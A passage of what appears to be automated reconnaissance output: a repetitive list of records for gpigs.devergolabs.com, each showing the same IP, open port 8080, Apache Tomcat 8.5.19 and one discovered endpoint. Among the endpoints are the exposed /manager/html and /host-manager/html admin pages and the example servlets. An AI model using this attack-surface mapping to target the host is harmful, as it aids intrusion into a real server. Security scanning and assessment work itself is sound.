'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/customer', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/categories', 'method': 'POST', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/categories', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/applications', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/apis', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/manager/status', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/manager/html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/host-manager/html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/examples/websocket/index.xhtml', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/examples/servlets', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/examples/jsp', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/examples/', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/windows-service-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/windows-auth-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/websocketapi/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/web-socket-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/virtual-hosting-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/tribes/introduction.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/ssl-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/ssi-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/setup.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/servletapi/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/security-manager-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/security-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/rewrite.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/realm-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/proxy-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/monitoring.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/mbeans-descriptors-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/maven-jars.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/manager-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/logging.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/jspapi/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/jndi-resources-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/jndi-datasource-examples-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/jdbc-pool.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/jasper-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/introduction.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/html-manager-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/funcspecs/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/extras.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/elapi/index.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/developers.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/deployer-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/default-servlet.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/connectors.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/configure', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/valve.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/systemprops.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/sessionidgenerator.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/service.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/server.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/resources.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/realm.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/manager.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/loader.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/listeners.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/jaspic.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/jar-scanner.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/', 'method': 'GET', 'technology': None, 